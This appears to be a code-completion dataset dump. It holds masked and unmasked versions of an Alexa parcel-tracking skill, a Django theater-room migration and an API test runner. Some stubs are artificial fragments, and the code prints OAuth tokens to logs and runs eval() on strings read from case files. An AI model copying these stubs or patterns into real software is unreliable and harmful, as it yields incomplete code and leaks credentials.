should_end_session=true\n \"\"\"\n print('on_session_ended requestId=' + session_ended_request['requestId'\n ] + ', sessionId=' + session['sessionId'])\n\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print('event.session.application.applicationId=' + event['session'][\n 'application']['applicationId'])\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n if event['request']['type'] == 'LaunchRequest':\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == 'IntentRequest':\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == 'SessionEndedRequest':\n return on_session_ended(event['request'], event['session'])\n",
"step-4": "<mask token>\nfrom __future__ import print_function\nimport traceback\nimport requests\nimport os\nimport json\n\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {'outputSpeech': {'type': 'PlainText', 'text': output}, 'card':\n {'type': 'Simple', 'title': 'SessionSpeechlet - ' + title,\n 'content': 'SessionSpeechlet - ' + output}, 'reprompt': {\n 'outputSpeech': {'type': 'PlainText', 'text': reprompt_text}},\n 'shouldEndSession': should_end_session}\n\n\ndef build_response(session_attributes, speechlet_response):\n return {'version': '1.0', 'sessionAttributes': session_attributes,\n 'response': speechlet_response}\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n session_attributes = {}\n card_title = 'Welcome to PB Parcel Tracker'\n speech_output = 'Please give first 10 digits of tracking number'\n reprompt_text = 'Please give first 10 digits of tracking number'\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = 'Session Ended'\n speech_output = (\n 'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')\n should_end_session = True\n return build_response({}, build_speechlet_response(card_title,\n speech_output, None, should_end_session))\n\n\ndef setFirstEleven(intent, session):\n session_attributes = {}\n should_end_session = False\n speech_output = 'Now give remaining digits'\n reprompt_text = 'Now give the next eleven numbers'\n try:\n tracking_number_1 = intent['slots']['One']['value']\n tracking_number_2 = intent['slots']['Two']['value']\n tracking_number_3 = intent['slots']['Three']['value']\n tracking_number_4 = intent['slots']['Four']['value']\n tracking_number_5 = intent['slots']['Five']['value']\n tracking_number_6 = intent['slots']['Six']['value']\n tracking_number_7 = intent['slots']['Seven']['value']\n tracking_number_8 = intent['slots']['Eight']['value']\n tracking_number_9 = intent['slots']['Nine']['value']\n tracking_number_10 = intent['slots']['Ten']['value']\n first_ten = '%s%s%s%s%s%s%s%s%s%s' % (tracking_number_1,\n tracking_number_2, tracking_number_3, tracking_number_4,\n tracking_number_5, tracking_number_6, tracking_number_7,\n tracking_number_8, tracking_number_9, tracking_number_10)\n session_attributes['first_ten'] = first_ten\n print('session after adding first ten--->')\n print(session_attributes)\n except Exception as app_exception:\n traceback.print_tb\n speech_output = (\n 'There was some problem, Please provide first ten digits of the tracking number'\n )\n reprompt_text = 'Please say first ten digits of the tracking number'\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef getParcelStatus(intent, session):\n session_attributes = {}\n should_end_session = True\n speech_output = 'There was some problem in taking your input'\n reprompt_text = 'Please say remaining digits of the tracking number'\n try:\n tracking_number_11 = intent['slots']['Eleven']['value']\n tracking_number_12 = intent['slots']['Twelve']['value']\n tracking_number_13 = intent['slots']['Thirteen']['value']\n tracking_number_14 = intent['slots']['Fourteen']['value']\n tracking_number_15 = intent['slots']['Fifteen']['value']\n tracking_number_16 = intent['slots']['Sixteen']['value']\n tracking_number_17 = intent['slots']['Seventeen']['value']\n tracking_number_18 = intent['slots']['Eighteen']['value']\n tracking_number_19 = intent['slots']['Nineteen']['value']\n tracking_number_20 = intent['slots']['Twenty']['value']\n tracking_number_21 = intent['slots']['TwentyOne']['value']\n tracking_number_22 = intent['slots']['TwentyTwo']['value']\n tracking_number = '%s%s%s%s%s%s%s%s%s%s%s%s' % (tracking_number_11,\n tracking_number_12, tracking_number_13, tracking_number_14,\n tracking_number_15, tracking_number_16, tracking_number_17,\n tracking_number_18, tracking_number_19, tracking_number_20,\n tracking_number_21, tracking_number_22)\n print(\"'first_ten' not in session['attributes']--->\")\n print('first_ten' not in session['attributes'])\n full_tracking_number = '%s%s' % (session['attributes']['first_ten'],\n tracking_number)\n bearer = 'Bearer %s' % session['access_token']\n print('USPS FULL Tracking Number ----> %s' % full_tracking_number)\n url = (\n 'https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS'\n % full_tracking_number)\n r = requests.get(url, headers={'Authorization': bearer})\n tracking_response = {}\n tracking_response = json.loads(r.content)\n if r.status_code == 200:\n speech_output = 'The status of the parcel is ' + tracking_response[\n 'status']\n reprompt_text = 'The status of the parcel is ' + tracking_response[\n 'status']\n else:\n speech_output = tracking_response['errors'][0]['errorDescription']\n reprompt_text = tracking_response['errors'][0]['errorDescription']\n print(r.content)\n except Exception as app_exception:\n traceback.print_tb\n should_end_session = False\n if ('attributes' not in session or 'attributes' in session and \n 'first_ten' not in session['attributes']):\n speech_output = (\n 'Please provide only first ten digits of the tracking number')\n reprompt_text = (\n 'Please provide only first ten digits of the tracking number')\n else:\n speech_output = (\n 'There was some problem, Please say remaining digits of the tracking number'\n )\n reprompt_text = (\n 'Please say remaining digits of the tracking number')\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n print('on_session_started requestId=' + session_started_request[\n 'requestId'] + ', sessionId=' + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n print('on_launch requestId=' + launch_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = 'Basic ' + access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={'Authorization': access_key_value,\n 'Content-Type': 'application/x-www-form-urlencoded'}, data={\n 'grant_type': 'client_credentials'})\n print(r.status_code)\n if r.status_code == 200:\n j = json.loads(r.content)\n print(j)\n session['access_token'] = j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n print('on_intent requestId=' + intent_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n if 'access_token' not in session:\n oauth_request(session)\n print(session['access_token'])\n if intent_name == 'Tracking':\n return setFirstEleven(intent, session)\n elif intent_name == 'TrackingSecond':\n return getParcelStatus(intent, session)\n elif intent_name == 'AMAZON.HelpIntent':\n return get_welcome_response()\n elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':\n return handle_session_end_request()\n else:\n raise ValueError('Invalid intent')\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print('on_session_ended requestId=' + session_ended_request['requestId'\n ] + ', sessionId=' + session['sessionId'])\n\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print('event.session.application.applicationId=' + event['session'][\n 'application']['applicationId'])\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n if event['request']['type'] == 'LaunchRequest':\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == 'IntentRequest':\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == 'SessionEndedRequest':\n return on_session_ended(event['request'], event['session'])\n",
"step-5": "\"\"\"\nCode for Alexa skill to check PB tracking\n\"\"\"\n\nfrom __future__ import print_function\nimport traceback\nimport requests\nimport os\nimport json\n\n\n# --------------- Helpers that build all of the responses ----------------------\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'card': {\n 'type': 'Simple',\n 'title': \"SessionSpeechlet - \" + title,\n 'content': \"SessionSpeechlet - \" + output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n\n\n# --------------- Functions that control the skill's behavior ------------------\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n\n session_attributes = {}\n card_title = \"Welcome to PB Parcel Tracker\"\n speech_output = \"Please give first 10 digits of tracking number\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Please give first 10 digits of tracking number\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = \"Session Ended\"\n speech_output = \"Thank you for trying the Alexa Skills Kit sample. \" \\\n \"Have a nice day! \"\n # Setting this to true ends the session and exits the skill.\n should_end_session = True\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n#----- get tracking ------\n\ndef setFirstEleven(intent, session):\n session_attributes = {}\n should_end_session = False\n speech_output = \"Now give remaining digits\"\n reprompt_text = \"Now give the next eleven numbers\"\n try:\n tracking_number_1 = intent['slots']['One']['value']\n tracking_number_2 = intent['slots']['Two']['value']\n tracking_number_3 = intent['slots']['Three']['value']\n tracking_number_4 = intent['slots']['Four']['value']\n tracking_number_5 = intent['slots']['Five']['value']\n tracking_number_6 = intent['slots']['Six']['value']\n tracking_number_7 = intent['slots']['Seven']['value']\n tracking_number_8 = intent['slots']['Eight']['value']\n tracking_number_9 = intent['slots']['Nine']['value']\n tracking_number_10 = intent['slots']['Ten']['value']\n first_ten = \"%s%s%s%s%s%s%s%s%s%s\" % (tracking_number_1, tracking_number_2,tracking_number_3, tracking_number_4,tracking_number_5, tracking_number_6,tracking_number_7, tracking_number_8,tracking_number_9, tracking_number_10)\n session_attributes['first_ten'] = first_ten\n print(\"session after adding first ten--->\")\n print(session_attributes)\n except Exception as app_exception:\n traceback.print_tb\n speech_output = \"There was some problem, Please provide first ten digits of the tracking number\"\n reprompt_text = \"Please say first ten digits of the tracking number\"\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n#----- get tracking ------\n\ndef getParcelStatus(intent, session):\n session_attributes = {}\n should_end_session = True\n speech_output = \"There was some problem in taking your input\"\n reprompt_text = \"Please say remaining digits of the tracking number\"\n try:\n tracking_number_11= intent['slots']['Eleven']['value']\n tracking_number_12 = intent['slots']['Twelve']['value']\n tracking_number_13 = intent['slots']['Thirteen']['value']\n tracking_number_14 = intent['slots']['Fourteen']['value']\n tracking_number_15 = intent['slots']['Fifteen']['value']\n tracking_number_16 = intent['slots']['Sixteen']['value']\n tracking_number_17 = intent['slots']['Seventeen']['value']\n tracking_number_18 = intent['slots']['Eighteen']['value']\n tracking_number_19 = intent['slots']['Nineteen']['value']\n tracking_number_20 = intent['slots']['Twenty']['value']\n tracking_number_21 = intent['slots']['TwentyOne']['value']\n tracking_number_22 = intent['slots']['TwentyTwo']['value']\n tracking_number = \"%s%s%s%s%s%s%s%s%s%s%s%s\" % (tracking_number_11,tracking_number_12, tracking_number_13, tracking_number_14,tracking_number_15, tracking_number_16,tracking_number_17, tracking_number_18,tracking_number_19, tracking_number_20,tracking_number_21, tracking_number_22)\n print(\"'first_ten' not in session['attributes']--->\")\n print('first_ten' not in session['attributes'])\n full_tracking_number = \"%s%s\" % (session['attributes']['first_ten'], tracking_number)\n bearer = \"Bearer %s\" % (session['access_token'])\n print(\"USPS FULL Tracking Number ----> %s\" % (full_tracking_number))\n url = \"https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS\" %(full_tracking_number)\n r=requests.get(url, headers={\"Authorization\" : bearer})\n tracking_response = {}\n tracking_response = json.loads(r.content)\n if(r.status_code == 200):\n speech_output = \"The status of the parcel is \"+tracking_response['status']\n reprompt_text = \"The status of the parcel is \"+tracking_response['status']\n else:\n speech_output = tracking_response['errors'][0]['errorDescription']\n reprompt_text = tracking_response['errors'][0]['errorDescription']\n print(r.content)\n except Exception as app_exception:\n traceback.print_tb\n should_end_session = False\n if ('attributes' not in session or ('attributes' in session and 'first_ten' not in session['attributes'])):\n speech_output = \"Please provide only first ten digits of the tracking number\"\n reprompt_text = \"Please provide only first ten digits of the tracking number\"\n else:\n speech_output = \"There was some problem, Please say remaining digits of the tracking number\"\n reprompt_text = \"Please say remaining digits of the tracking number\"\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n# --------------- Events ------------------\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n print(\"on_session_started requestId=\" + session_started_request['requestId']\n + \", sessionId=\" + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = \"Basic \"+access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={\"Authorization\": access_key_value,\n \"Content-Type\": \"application/x-www-form-urlencoded\"},\n data={\"grant_type\": \"client_credentials\"})\n print(r.status_code)\n if(r.status_code == 200):\n j = json.loads(r.content)\n print(j)\n session['access_token'] = j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n if('access_token' not in session):\n oauth_request(session)\n print(session['access_token'])\n # Dispatch to your skill's intent handlers\n if intent_name == \"Tracking\":\n return setFirstEleven(intent, session)\n elif intent_name == \"TrackingSecond\":\n return getParcelStatus(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here\n\n\n# --------------- Main handler ------------------\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])\n",
"step-ids": [
9,
10,
12,
13,
14
]
}
|
[
9,
10,
12,
13,
14
] |
# Generated by Django 2.2.3 on 2019-07-14 13:34
from django.db import migrations, models
def forwards_func(apps, schema_editor):
""" Add Theater Rooms """
TheaterRoom = apps.get_model("main", "TheaterRoom")
db_alias = schema_editor.connection.alias
TheaterRoom.objects.using(db_alias).bulk_create([
TheaterRoom(name="Red Room", rows_count=10, seats_per_row_count=15),
TheaterRoom(name="Blue Room", rows_count=20, seats_per_row_count=30),
])
def reverse_func(apps, schema_editor):
""" No need to do anything since the table is dropped completely """
pass
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='TheaterRoom',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
('rows_count', models.IntegerField()),
('seats_per_row_count', models.IntegerField()),
],
),
migrations.RunPython(forwards_func, reverse_func),
]
|
normal
|
{
"blob_id": "a4b61a5a79e314e56ba25c6e2e735bd2ee4ef0d3",
"index": 4551,
"step-1": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\ndef reverse_func(apps, schema_editor):\n \"\"\" No need to do anything since the table is dropped completely \"\"\"\n pass\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='TheaterRoom', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('name', models.CharField(max_length=20\n )), ('rows_count', models.IntegerField()), ('seats_per_row_count',\n models.IntegerField())]), migrations.RunPython(forwards_func,\n reverse_func)]\n",
"step-3": "<mask token>\n\n\ndef forwards_func(apps, schema_editor):\n \"\"\" Add Theater Rooms \"\"\"\n TheaterRoom = apps.get_model('main', 'TheaterRoom')\n db_alias = schema_editor.connection.alias\n TheaterRoom.objects.using(db_alias).bulk_create([TheaterRoom(name=\n 'Red Room', rows_count=10, seats_per_row_count=15), TheaterRoom(\n name='Blue Room', rows_count=20, seats_per_row_count=30)])\n\n\ndef reverse_func(apps, schema_editor):\n \"\"\" No need to do anything since the table is dropped completely \"\"\"\n pass\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='TheaterRoom', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('name', models.CharField(max_length=20\n )), ('rows_count', models.IntegerField()), ('seats_per_row_count',\n models.IntegerField())]), migrations.RunPython(forwards_func,\n reverse_func)]\n",
"step-4": "from django.db import migrations, models\n\n\ndef forwards_func(apps, schema_editor):\n \"\"\" Add Theater Rooms \"\"\"\n TheaterRoom = apps.get_model('main', 'TheaterRoom')\n db_alias = schema_editor.connection.alias\n TheaterRoom.objects.using(db_alias).bulk_create([TheaterRoom(name=\n 'Red Room', rows_count=10, seats_per_row_count=15), TheaterRoom(\n name='Blue Room', rows_count=20, seats_per_row_count=30)])\n\n\ndef reverse_func(apps, schema_editor):\n \"\"\" No need to do anything since the table is dropped completely \"\"\"\n pass\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='TheaterRoom', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('name', models.CharField(max_length=20\n )), ('rows_count', models.IntegerField()), ('seats_per_row_count',\n models.IntegerField())]), migrations.RunPython(forwards_func,\n reverse_func)]\n",
"step-5": "# Generated by Django 2.2.3 on 2019-07-14 13:34\n\nfrom django.db import migrations, models\n\n\ndef forwards_func(apps, schema_editor):\n \"\"\" Add Theater Rooms \"\"\"\n TheaterRoom = apps.get_model(\"main\", \"TheaterRoom\")\n db_alias = schema_editor.connection.alias\n TheaterRoom.objects.using(db_alias).bulk_create([\n TheaterRoom(name=\"Red Room\", rows_count=10, seats_per_row_count=15),\n TheaterRoom(name=\"Blue Room\", rows_count=20, seats_per_row_count=30),\n ])\n\n\ndef reverse_func(apps, schema_editor):\n \"\"\" No need to do anything since the table is dropped completely \"\"\"\n pass\n\n\nclass Migration(migrations.Migration):\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='TheaterRoom',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=20)),\n ('rows_count', models.IntegerField()),\n ('seats_per_row_count', models.IntegerField()),\n ],\n ),\n migrations.RunPython(forwards_func, reverse_func),\n ]\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
from src.testcase.case import Case
from src.utils import *
from src.protocol.register import get_conn
from src.precondition import *
class OneCase(object):
"""
Main flow of running one case's autotest
"""
PASS = True
FAIL = False
def __init__(self, case_path, *args, **kwargs):
self._case_path = str(case_path)
self._case_dict = {}
self._step_result = []
self._step_msg = []
self._passed = False
def run(self):
self.load_case(self._case_path)
self.satisfy_precondition(self._case_dict)
self.exec_steps(self._case_dict)
self.save_result()
def load_case(self, case_path):
self._case_dict = Case(file_path=case_path).case_dict
def satisfy_precondition(self, case_dict):
pre = case_dict.get('precondition')
if pre:
# pre functions
func_list = pre.get('prefunction')
for func in func_list:
_func = eval(func.get('func_name'))
_args = {_.get('name'): trans_type(_.get('value'), _.get('type')) for _ in func.get('args')}
_func(**_args)
# dependency
check_dependency(pre.get('dependency'))
def check_dependency(self):
pass # ToDo
def exec_steps(self, case_dict):
"""
"""
for step in case_dict.get('step'):
# input
_input = step.get('input')
res = {}
for protocol, _args in _input.iteritems():
req = get_conn(protocol)(**_args)
res = req.response
# compare output
_output = step.get('output')
if _output.get('strict'):
pass # ToDo
try:
for _ in _output.get('expect'):
_var = _.get('var')
_expect_value = trans_type(_['val']['value'], _['val']['type'])
_real_value = res.get(_var)
if _.get('cmp') == '==':
assert _expect_value == _real_value, "Not equal! \n\tExpect: {}\n\tGot: {}".format(
_expect_value, _real_value)
except AssertionError as e:
self._step_result.append(self.FAIL)
self._step_msg.append(e.message)
else:
self._step_result.append(self.PASS)
self._step_msg.append('Passed!')
self._passed = all(self._step_result)
def save_result(self):
"""
save result for this test
1) print to console
2) record to mysql
3) upload to testlink
"""
self.print_to_console()
def print_to_console(self):
if self._passed:
print('All steps passed for case: {}'.format(self._case_dict.get('name')))
else:
err('Failed on case: {}'.format(self._case_dict.get('name')))
step_length = range(1, len(self._step_result) + 1)
for i, result, msg in zip(step_length, self._step_result, self._step_msg):
if result == self.FAIL:
err('Step {} failed for reason:\n\t{}'.format(i, msg))
if __name__ == '__main__':
testcase = OneCase('/Users/eacon/github/APIAutoTestFramework/case/sample.json')
testcase.run()
|
normal
|
{
"blob_id": "f658959bf7fa5e02a577119930c9b9c1ef59f432",
"index": 2845,
"step-1": "<mask token>\n\n\nclass OneCase(object):\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, case_path, *args, **kwargs):\n self._case_path = str(case_path)\n self._case_dict = {}\n self._step_result = []\n self._step_msg = []\n self._passed = False\n\n def run(self):\n self.load_case(self._case_path)\n self.satisfy_precondition(self._case_dict)\n self.exec_steps(self._case_dict)\n self.save_result()\n\n def load_case(self, case_path):\n self._case_dict = Case(file_path=case_path).case_dict\n\n def satisfy_precondition(self, case_dict):\n pre = case_dict.get('precondition')\n if pre:\n func_list = pre.get('prefunction')\n for func in func_list:\n _func = eval(func.get('func_name'))\n _args = {_.get('name'): trans_type(_.get('value'), _.get(\n 'type')) for _ in func.get('args')}\n _func(**_args)\n check_dependency(pre.get('dependency'))\n <mask token>\n <mask token>\n\n def save_result(self):\n \"\"\"\n save result for this test\n 1) print to console\n 2) record to mysql\n 3) upload to testlink\n \"\"\"\n self.print_to_console()\n\n def print_to_console(self):\n if self._passed:\n print('All steps passed for case: {}'.format(self._case_dict.\n get('name')))\n else:\n err('Failed on case: {}'.format(self._case_dict.get('name')))\n step_length = range(1, len(self._step_result) + 1)\n for i, result, msg in zip(step_length, self._step_result, self.\n _step_msg):\n if result == self.FAIL:\n err('Step {} failed for reason:\\n\\t{}'.format(i, msg))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass OneCase(object):\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, case_path, *args, **kwargs):\n self._case_path = str(case_path)\n self._case_dict = {}\n self._step_result = []\n self._step_msg = []\n self._passed = False\n\n def run(self):\n self.load_case(self._case_path)\n self.satisfy_precondition(self._case_dict)\n self.exec_steps(self._case_dict)\n self.save_result()\n\n def load_case(self, case_path):\n self._case_dict = Case(file_path=case_path).case_dict\n\n def satisfy_precondition(self, case_dict):\n pre = case_dict.get('precondition')\n if pre:\n func_list = pre.get('prefunction')\n for func in func_list:\n _func = eval(func.get('func_name'))\n _args = {_.get('name'): trans_type(_.get('value'), _.get(\n 'type')) for _ in func.get('args')}\n _func(**_args)\n check_dependency(pre.get('dependency'))\n\n def check_dependency(self):\n pass\n\n def exec_steps(self, case_dict):\n \"\"\"\n \"\"\"\n for step in case_dict.get('step'):\n _input = step.get('input')\n res = {}\n for protocol, _args in _input.iteritems():\n req = get_conn(protocol)(**_args)\n res = req.response\n _output = step.get('output')\n if _output.get('strict'):\n pass\n try:\n for _ in _output.get('expect'):\n _var = _.get('var')\n _expect_value = trans_type(_['val']['value'], _['val'][\n 'type'])\n _real_value = res.get(_var)\n if _.get('cmp') == '==':\n assert _expect_value == _real_value, 'Not equal! \\n\\tExpect: {}\\n\\tGot: {}'.format(\n _expect_value, _real_value)\n except AssertionError as e:\n self._step_result.append(self.FAIL)\n self._step_msg.append(e.message)\n else:\n self._step_result.append(self.PASS)\n self._step_msg.append('Passed!')\n self._passed = all(self._step_result)\n\n def save_result(self):\n \"\"\"\n save result for this test\n 1) print to console\n 2) record to mysql\n 3) upload to testlink\n \"\"\"\n self.print_to_console()\n\n def print_to_console(self):\n if self._passed:\n print('All steps passed for case: {}'.format(self._case_dict.\n get('name')))\n else:\n err('Failed on case: {}'.format(self._case_dict.get('name')))\n step_length = range(1, len(self._step_result) + 1)\n for i, result, msg in zip(step_length, self._step_result, self.\n _step_msg):\n if result == self.FAIL:\n err('Step {} failed for reason:\\n\\t{}'.format(i, msg))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass OneCase(object):\n <mask token>\n PASS = True\n FAIL = False\n\n def __init__(self, case_path, *args, **kwargs):\n self._case_path = str(case_path)\n self._case_dict = {}\n self._step_result = []\n self._step_msg = []\n self._passed = False\n\n def run(self):\n self.load_case(self._case_path)\n self.satisfy_precondition(self._case_dict)\n self.exec_steps(self._case_dict)\n self.save_result()\n\n def load_case(self, case_path):\n self._case_dict = Case(file_path=case_path).case_dict\n\n def satisfy_precondition(self, case_dict):\n pre = case_dict.get('precondition')\n if pre:\n func_list = pre.get('prefunction')\n for func in func_list:\n _func = eval(func.get('func_name'))\n _args = {_.get('name'): trans_type(_.get('value'), _.get(\n 'type')) for _ in func.get('args')}\n _func(**_args)\n check_dependency(pre.get('dependency'))\n\n def check_dependency(self):\n pass\n\n def exec_steps(self, case_dict):\n \"\"\"\n \"\"\"\n for step in case_dict.get('step'):\n _input = step.get('input')\n res = {}\n for protocol, _args in _input.iteritems():\n req = get_conn(protocol)(**_args)\n res = req.response\n _output = step.get('output')\n if _output.get('strict'):\n pass\n try:\n for _ in _output.get('expect'):\n _var = _.get('var')\n _expect_value = trans_type(_['val']['value'], _['val'][\n 'type'])\n _real_value = res.get(_var)\n if _.get('cmp') == '==':\n assert _expect_value == _real_value, 'Not equal! \\n\\tExpect: {}\\n\\tGot: {}'.format(\n _expect_value, _real_value)\n except AssertionError as e:\n self._step_result.append(self.FAIL)\n self._step_msg.append(e.message)\n else:\n self._step_result.append(self.PASS)\n self._step_msg.append('Passed!')\n self._passed = all(self._step_result)\n\n def save_result(self):\n \"\"\"\n save result for this test\n 1) print to console\n 2) record to mysql\n 3) upload to testlink\n \"\"\"\n self.print_to_console()\n\n def print_to_console(self):\n if self._passed:\n print('All steps passed for case: {}'.format(self._case_dict.\n get('name')))\n else:\n err('Failed on case: {}'.format(self._case_dict.get('name')))\n step_length = range(1, len(self._step_result) + 1)\n for i, result, msg in zip(step_length, self._step_result, self.\n _step_msg):\n if result == self.FAIL:\n err('Step {} failed for reason:\\n\\t{}'.format(i, msg))\n\n\n<mask token>\n",
"step-4": "from src.testcase.case import Case\nfrom src.utils import *\nfrom src.protocol.register import get_conn\nfrom src.precondition import *\n\n\nclass OneCase(object):\n \"\"\"\n Main flow of running one case's autotest\n \"\"\"\n PASS = True\n FAIL = False\n\n def __init__(self, case_path, *args, **kwargs):\n self._case_path = str(case_path)\n self._case_dict = {}\n self._step_result = []\n self._step_msg = []\n self._passed = False\n\n def run(self):\n self.load_case(self._case_path)\n self.satisfy_precondition(self._case_dict)\n self.exec_steps(self._case_dict)\n self.save_result()\n\n def load_case(self, case_path):\n self._case_dict = Case(file_path=case_path).case_dict\n\n def satisfy_precondition(self, case_dict):\n pre = case_dict.get('precondition')\n if pre:\n func_list = pre.get('prefunction')\n for func in func_list:\n _func = eval(func.get('func_name'))\n _args = {_.get('name'): trans_type(_.get('value'), _.get(\n 'type')) for _ in func.get('args')}\n _func(**_args)\n check_dependency(pre.get('dependency'))\n\n def check_dependency(self):\n pass\n\n def exec_steps(self, case_dict):\n \"\"\"\n \"\"\"\n for step in case_dict.get('step'):\n _input = step.get('input')\n res = {}\n for protocol, _args in _input.iteritems():\n req = get_conn(protocol)(**_args)\n res = req.response\n _output = step.get('output')\n if _output.get('strict'):\n pass\n try:\n for _ in _output.get('expect'):\n _var = _.get('var')\n 